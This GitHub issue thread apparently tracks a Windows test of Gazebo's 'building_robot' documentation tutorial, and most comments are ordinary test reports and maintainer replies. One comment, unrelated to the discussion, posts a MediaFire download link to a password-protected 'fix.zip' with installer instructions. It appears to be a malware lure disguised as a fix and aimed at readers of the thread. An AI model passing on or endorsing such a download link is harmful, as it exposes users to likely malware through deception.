gazebosim/gazebo_test_cases #1042: docs: building_robot

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/docs/ionic/building_robot)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/building_robot.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Axolot5784, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

knmcguire, 2024-09-04:
You can add me to this one now that I've managed to have properly installed gazebo on windows in #1701

knmcguire, 2024-09-04:
Success! ✅ The only difference though was that I had to start the sim with `gz sim -s building_robot.sdf` and the seperate terminal for the gui. I couldn't leave the gui open and restart the server because I would get an error of Items already existing, but that wasn't part of the tutorial. Anyone who went through the first windows install tutorial knows this anyway.

Here is the resulting robot.

[image]

iche033, 2024-09-04:
>  I couldn't leave the gui open and restart the server because I would get an error of Items already existing

yeah the GUI currently does not detect / react when the server is shutdown so it is expected.

ok I'll close this issue as it sounds like it's working fine.

closed 2024-09-04 by iche033